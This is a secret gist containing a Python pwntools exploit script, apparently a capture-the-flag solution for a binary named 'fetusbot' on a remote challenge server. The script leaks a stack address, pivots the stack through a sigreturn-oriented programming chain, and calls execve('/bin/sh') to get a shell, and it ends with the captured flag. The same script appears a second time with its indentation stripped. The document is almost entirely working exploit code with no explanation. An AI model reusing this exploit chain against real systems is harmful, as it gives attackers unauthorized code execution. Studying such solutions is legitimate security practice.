rpm0618/exploit.py Secret

## exploit.py
from pwn import context, ELF, args, process, gdb, remote, p8, u64, flat, p64, tube, p16, p32, asm, FileStructure, SigreturnFrame

import time
import os

binary_path = "./fetusbot"
context.arch = "amd64"

gs = """
# break * 0x8048000
# continue
"""


def start():
    if args.DEBUG:
        context.log_level = "DEBUG"

    if args.REMOTE:
        # nc 0.cloud.chals.io 20922
        return remote("0.cloud.chals.io", 26925)
        # return remote("localhost", 2000)

    if args.GDB:
        context.terminal = ["kitty", "@", "launch", "--location", "before"]
        return gdb.debug([binary_path], gdbscript=gs, env={
            "NIX_DEBUG_INFO_DIRS": os.getenv("NIX_DEBUG_INFO_DIRS")
        })

    return process([binary_path])


def breakpoint(io, msg=None):
    if args.GDB:
        if msg is not None:
            print(f"*** BREAKPOINT {msg} *** ")
        else:
            print("*** BREAKPOINT ***")


XOR_EAX = 0x133700a
SYSCALL_RET = 0x13370c3
MOV_RDI_RSP = 0x13370b8

ENTRY = 0x13370bc

io = start()

io.send(flat({
    0x00: p64(XOR_EAX),
    0x08: p64(SYSCALL_RET),
    0x10: p64(SYSCALL_RET),

    0x18: p64(XOR_EAX),
    0x20: p64(ENTRY),
}))

time.sleep(1)

io.sendline()

leaks = io.clean()
stack_leak = u64(leaks[0x78:0x80])
print(f"STACK: {hex(stack_leak)}")

LOCATION = stack_leak + 0x36 - 0x1000

# Pivot stack a known location, reading in the contents of the next ropchain
stack_pivot_frame = SigreturnFrame()
stack_pivot_frame.rsp = LOCATION
stack_pivot_frame.rip = SYSCALL_RET
stack_pivot_frame.rdi = 0
stack_pivot_frame.rsi = LOCATION
stack_pivot_frame.rdx = 0x1000
stack_pivot_frame.rax = 0  # read

pivot_srop_chain = (
    p64(XOR_EAX)
    + p64(SYSCALL_RET)
    + p64(MOV_RDI_RSP)
    + p64(SYSCALL_RET)
    + bytes(stack_pivot_frame)[:0xda]
)

io.send(flat({
    0x00: pivot_srop_chain,
}))

# Setting rax to 0xf (sigreturn)
io.send(flat({
    0xe: p8(1)
}))

time.sleep(1)

exec_frame = SigreturnFrame()
exec_frame.rsp = LOCATION
exec_frame.rip = SYSCALL_RET
exec_frame.rdi = LOCATION + 0xb8
exec_frame.rsi = 0x0
exec_frame.rdx = 0x0
exec_frame.rax = 0x3b  # execve
# put /bin/sh in a known place on the stack
exec_frame.rcx = u64(b"/bin/sh\0")

exec_srop_chain = (
    p64(XOR_EAX)
    + p64(SYSCALL_RET)
    + p64(MOV_RDI_RSP)
    + p64(SYSCALL_RET)
    + bytes(exec_frame)[:0xda]
)

io.send(flat({
    0x00: exec_srop_chain
}))

# Setting rax to 0xf (sigreturn)
io.send(flat({
    0xe: p8(1)
}))

io.interactive()

# brck{Th4ts_A_h34ltHy_R1ght_0cc1put_P0st3r10r}
	from pwn import context, ELF, args, process, gdb, remote, p8, u64, flat, p64, tube, p16, p32, asm, FileStructure, SigreturnFrame

	import time
	import os

	binary_path = "./fetusbot"
	context.arch = "amd64"

	gs = """
	# break * 0x8048000
	# continue
	"""


	def start():
	if args.DEBUG:
	context.log_level = "DEBUG"

	if args.REMOTE:
	# nc 0.cloud.chals.io 20922
	return remote("0.cloud.chals.io", 26925)
	# return remote("localhost", 2000)

	if args.GDB:
	context.terminal = ["kitty", "@", "launch", "--location", "before"]
	return gdb.debug([binary_path], gdbscript=gs, env={
	"NIX_DEBUG_INFO_DIRS": os.getenv("NIX_DEBUG_INFO_DIRS")
	})

	return process([binary_path])


	def breakpoint(io, msg=None):
	if args.GDB:
	if msg is not None:
	print(f"* BREAKPOINT {msg} * ")
	else:
	print("* BREAKPOINT *")


	XOR_EAX = 0x133700a
	SYSCALL_RET = 0x13370c3
	MOV_RDI_RSP = 0x13370b8

	ENTRY = 0x13370bc

	io = start()

	io.send(flat({
	0x00: p64(XOR_EAX),
	0x08: p64(SYSCALL_RET),
	0x10: p64(SYSCALL_RET),

	0x18: p64(XOR_EAX),
	0x20: p64(ENTRY),
	}))

	time.sleep(1)

	io.sendline()

	leaks = io.clean()
	stack_leak = u64(leaks[0x78:0x80])
	print(f"STACK: {hex(stack_leak)}")

	LOCATION = stack_leak + 0x36 - 0x1000

	# Pivot stack a known location, reading in the contents of the next ropchain
	stack_pivot_frame = SigreturnFrame()
	stack_pivot_frame.rsp = LOCATION
	stack_pivot_frame.rip = SYSCALL_RET
	stack_pivot_frame.rdi = 0
	stack_pivot_frame.rsi = LOCATION
	stack_pivot_frame.rdx = 0x1000
	stack_pivot_frame.rax = 0 # read

	pivot_srop_chain = (
	p64(XOR_EAX)
	+ p64(SYSCALL_RET)
	+ p64(MOV_RDI_RSP)
	+ p64(SYSCALL_RET)
	+ bytes(stack_pivot_frame)[:0xda]
	)

	io.send(flat({
	0x00: pivot_srop_chain,
	}))

	# Setting rax to 0xf (sigreturn)
	io.send(flat({
	0xe: p8(1)
	}))

	time.sleep(1)

	exec_frame = SigreturnFrame()
	exec_frame.rsp = LOCATION
	exec_frame.rip = SYSCALL_RET
	exec_frame.rdi = LOCATION + 0xb8
	exec_frame.rsi = 0x0
	exec_frame.rdx = 0x0
	exec_frame.rax = 0x3b # execve
	# put /bin/sh in a known place on the stack
	exec_frame.rcx = u64(b"/bin/sh\0")

	exec_srop_chain = (
	p64(XOR_EAX)
	+ p64(SYSCALL_RET)
	+ p64(MOV_RDI_RSP)
	+ p64(SYSCALL_RET)
	+ bytes(exec_frame)[:0xda]
	)

	io.send(flat({
	0x00: exec_srop_chain
	}))

	# Setting rax to 0xf (sigreturn)
	io.send(flat({
	0xe: p8(1)
	}))

	io.interactive()

	# brck{Th4ts_A_h34ltHy_R1ght_0cc1put_P0st3r10r}